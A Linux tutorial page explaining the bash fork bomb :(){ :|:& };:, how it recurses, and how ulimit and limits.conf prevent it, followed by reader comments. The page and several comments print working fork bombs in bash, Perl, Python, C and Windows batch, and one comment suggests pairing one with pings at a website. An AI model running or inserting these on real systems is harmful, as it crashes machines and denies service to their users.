Understanding Bash fork() Bomb :(){ :|:& };: code

Can you explain the following bash code or bash fork() bomb code?
:(){ :|:& };:

The fork bomb is a form of denial-of-service (DoS) attack against a Linux or Unix-based system. It makes use of the fork operation. The :(){ :|:& };: is nothing but a bash function. This function get executed recursively. It is often used by sysadmin to test user process limitations on server. Linux process limits can be configured via /etc/security/limits.conf and PAM to avoid bash fork() bomb. Once a successful fork bomb has been activated in a system it may not be possible to resume normal operation without rebooting the system as the only solution to a fork bomb is to destroy all instances of it.

ADVERTISEMENTS

WARNING! These examples may crash your computer if executed.

Understanding :(){ :|:& };: fork() bomb code

:() – Defined the function called :. This function accepts no arguments. The syntax for bash function is as follows:

foo(){
 arg1=$1
 arg2=$2
 echo 'Bar..'
 #do_something on $arg argument
}

fork() bomb is defined as follows:

:(){
 :|:&
};:

:|: – Next it will call itself using programming technique called recursion and pipes the output to another call of the function ‘:’. The worst part is function get called two times to bomb your system.

& – Puts the function call in the background so child cannot die at all and start eating system resources.

; – Terminate the function definition.

: – Call (run) the function aka set the fork() bomb.
Here is more human readable code:

bomb() { 
 bomb | bomb &
}; bomb

Properly configured Linux / UNIX box should not go down when fork() bomb sets off. See the comment # 5 below for more fork bomb examples created in Perl, Windows XP (batch) and C.

Related: How to: Prevent a fork bomb by limiting user process under Linux.

Preventing fork bomb on Linux

Type the following ulimit command to find out the current maximum processes you can run on Linux:
ulimit -u
OR
ulimit -a
Preventing Fork Bomb on Linux
The number 128038 indicates that you can run 128038 processes. To protect your Linux system from a fork bomb, you need to lower that number. To limit your session to 5000 processes, use the following command
ulimit -S -u 5000

WARNING! Please don’t set ulimit numbers too low. This will prevent you from working on your system.

Now run fork bomb again:
:(){ :|:& };:
And you will see messages as follows:

bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable

You just avoided fork bomb on Linux. Run the following pgrep command to see the current threads limit:
pgrep -wcu $USER
Sample outputs:

5002
🐧 Get the latest tutorials on SysAdmin, Linux/Unix, Open Source/DevOps topics:
CategoryList of Unix and Linux commands
File Managementcat
FirewallCentOS 8 OpenSUSE RHEL 8 Ubuntu 16.04 Ubuntu 18.04 Ubuntu 20.04
Network Utilitiesdig host ip nmap
OpenVPNCentOS 7 CentOS 8 Debian 10 Debian 8/9 Ubuntu 18.04 Ubuntu 20.04
Package Managerapk apt
Processes Managementbg chroot cron disown fg jobs killall kill pidof pstree pwdx time
Searchinggrep whereis which
User Informationgroups id lastcomm last lid/libuser-lid logname members users whoami who w
WireGuard VPNCentOS 8 Debian 10 Firewall Ubuntu 20.04

ADVERTISEMENTS
32 comments… add one
  • mastrboy Nov 26, 2007 @ 9:53

    i tested this on a fresh install of CentOS and it totaly crashed :P

    How about a nice “howto” for protecting against this attacks?

  • raj Nov 27, 2007 @ 0:01

    I second the vote for a nice howto.

    Cheers

  • queue Nov 27, 2007 @ 17:02

    Thirded!

    How to prevent a “fork bomb”.

  • Bharat Nov 28, 2007 @ 1:19

    Yes How to must be started, for the benefits of the innocent users, as the viruses are spread by entities whose brains are configured differently.

  • l33t Nov 28, 2007 @ 9:09

    Perl exmaple:

    perl -e "fork while fork" &

    Python example:

    import os
      while(1):
          os.fork()

    Windows XP / Vista bat file example:

    :bomb
    start %0
    goto bomb

    UNIX style for Windows:

    %0|%0

    C program example:

    #include 
     int main() {   while(1)      fork();  } 

    Plz note that the fork bomb is a form of denial of service, so don’t run on production or unauthorized system.

  • Ofloo Nov 28, 2007 @ 11:42

    An other one is that when you have set a quota for your mailboxes and crontab is generating mail over and over eventually the quota will exceed, after a while the mailq will fill up with 1000’s of mail and the system will crash.

  • kunal Nov 28, 2007 @ 11:52

    Hi,

    i run it on my testing server and it start consuming my server process.
    so one thing is clear from this form bomb that it starting issuing new processes rather than threads.

    how we prevent our sites from such fork attacks

    Thanks in advance

    • Toni Kingo Jan 5, 2013 @ 18:39

      Yes. And when I don’t tie my shoe laces, I can fall…

      And, and, … And, … when I eat too much, I get stomach ache

  • 🐧 nixCraft Nov 28, 2007 @ 12:56
  • Bash Nov 28, 2007 @ 14:27

    I tried this on a virtual instance of SLAX, and it totally killed it.

  • bort Dec 5, 2007 @ 16:21

    perl inline…

    perl -e “fork while fork” &

  • ATOzTOA Jan 30, 2008 @ 4:15

    Sleek code :)

    I tried on FC4. Took only 1 minute as root.

    In WinXP, I waited till 7 minutes. Displayed some errors and all, but was responding. Tried MS Word, Task Manager, nothing could be executed. The machine was useless untill reset.

  • bradley Mar 31, 2008 @ 18:06

    This works very quickly on all windows:

    :bomb
    %0 | %0
    goto bomb

  • Joe Nov 13, 2008 @ 23:04

    This works faster on all windows:

    :bomb
    start %0
    %0|%0
    goto bomb

  • sharfah Nov 22, 2008 @ 14:42

    A fork bomb process which can no longer fork exits. The following short Z Shell code will typically get rid of the above fork bomb in about a minute:

    while (sleep 100 &!) do; done

    It keeps trying and will eventually start a new do-nothing process; Each new do-nothing process reduces the number of rampant “fork bomb” processes by one, until eventually all of them are eradicated, at which point the do-nothing processes can exit.

  • stealth Aug 29, 2009 @ 21:00

    Use ulimit -u 30 (where 30 it is a max number of process ) to protect yourself from this attack(or config your limits.conf)

  • Peter Sep 28, 2009 @ 15:55

    That would make a VERY geeky tattoo.

    :(){ :|:& };:

  • Edward Oct 17, 2009 @ 13:20

    This did 100% of nothing on my AuroraUX^ machine.
    Load went up for about min to min and a half, then the kernel killed the process for me.
    Silly Linux..

    • PyrexKidd Jun 17, 2010 @ 18:15

      On my Ubuntu 10.04 LTS the fork bomb launched about 2500 processes and then my kernel killed it. Total time ~< 5 min.

  • Marc Nov 20, 2009 @ 18:33

    How would i send a forkbomb/ebomb to an ip without requiring passwords like the ones controled by keys when u stimotaunisusley press keys it opens up stuff on the targets ip.

  • Victor Chaves Aug 12, 2010 @ 19:31

    Debian 5 is immune to this fork bomb.

  • newklear Nov 17, 2010 @ 20:25

    PCLinuxOS is immune

  • Änönymöüs Jan 11, 2011 @ 16:26

    WARNING! These examples may crash your computer if executed.

    may?
    They WILL crash your comp.
    Win7 – batch WILL kill (also input lag)

  • Ellisgeek Mar 4, 2011 @ 1:22

    try this on for (lack) of size:

    #/bin/bash
    $0&
    $0
    

    Very tiny fork bomb :D

  • modchan Oct 7, 2011 @ 10:47

    Tried on Mac OS X 10.7.1 from root, bomb was killed in 0.003 s.

  • Tryme Dec 1, 2011 @ 15:52
    :(){ : | : & }; : 
    • :() is a function name with the open and close parenthesis representing no parameters. The body of this function is within the braces {}.
    • : | : is a recursive call since : is the name of the function. The function gets called twice and is piping input from one call to the other.
    • & backgrounds the previous function call so that it will not die.
    • ; finishes the function declaration.
    • : Calls the function just defined.
  • StarDust Jan 6, 2012 @ 11:52

    I did the %0|%0 command in Windows XP. Type into Notepad and saved as FORKBOMB.BAT then double-clicked. Fortunately, I already had task manager running, so I right-clicked explorer and hit “end process tree” which left me with a blank desktop. I then used Alt+Ctrl+Del to reopen Task Manager and from there, typed explorer.exe in the RUN dialog to get Windows back up without rebooting.

    If you add an additional command, for example:

    PING [insert url of hated website]

    you can spam out DOS attacks as well while you watch your computer crash. Seriously people, don’t do that…

  • Stephen Wood Jul 24, 2012 @ 23:15

    It’s almost a right-of-passage to get tricked into running this command when you get your first system. Part of unwinding why your system just crashed actually teaches you quite a bit about unix pipes.

    For that reason I’m partly sad that in at least Ubuntu 12.04, the default ulimit setting prevents the bomb from taking down the system.

  • mark Feb 25, 2014 @ 22:36

    There is a minimal “cure” for this.

    Classic REISUB Linux magic key combo always works for rebooting computer, however, using Alt+SysRq+K will stop all processes on current tty. In the case it doesn’t work, probably you’re on X server and need to use Alt+SysRq+RK.

  • sugatang itlog Jul 22, 2014 @ 15:18

    Ahihi! CoreOS is immune. Though the system was unresponsive for 2 minutes.

    • sugatang itlog Jul 22, 2014 @ 15:33

      Ooops! Totally crashed. fork: Cannot allocate memory. Then Call Trace. Then, not responding to anything, just call trace. Awesome! Is this second to vmsplice?

      More power nixCraft!

  • John Drake Sep 9, 2017 @ 13:06

    Why can you create a function named : at all?

    :(){ echo colonfunc; }
    :
    colonfunc

    This works for in interactive shell, but not if you put this into a script.
    cat < colon.sh
    #!/bin/sh
    :(){ echo colonfunc; }
    :
    NNNN
    chmod +x colon.sh
    ./colon.sh
    ./colon.sh: line 2: `:': not a valid identifier

    This is what I would expect.
    I’ve noticed some but not all versions of bash also allow you to use:
    * @ , ? . + – =
    and other punctuation characters as shell function names.

    % @(){ echo colonfunc; }
    bash: syntax error near unexpected token `}’

    This behavior I would expect. However, try this on my OSX Macbook:
    % @(){ echo colonfunc; }
    % @
    colonfunc

    This is strange, it worked.

    What is the difference? Bash versions.
    @ works with:
    GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin16)
    @ does not work with:
    GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)

    Even worse, you can call some functions with punctuation names, but you cannot call them as functions. You can list shell functions with “set | less”. Now search /colonfunc in less for all of the shell functions:

    % () 
    { 
        echo colonfunc
    }
    , () 
    { 
        echo colonfunc
    }
    . () 
    { 
        echo colonfunc
    }
    = () 
    { 
        echo colonfunc
    }

    % is a function, but you cannot call it.

    % %
    bash: fg: %: no such job

    But this works just fine:
    % =
    colonfunc

    This behavior varies between versions of bash. The fact that shell does allow some punctuation characters as function names seems like a bug. The fact not all versions of bash allows the same set of punctuation characters as function names seems to verify this theory.

Leave a Reply

Your email address will not be published.

Use HTML <pre>...</pre>, <code>...</code> and <kbd>...</kbd> for code samples.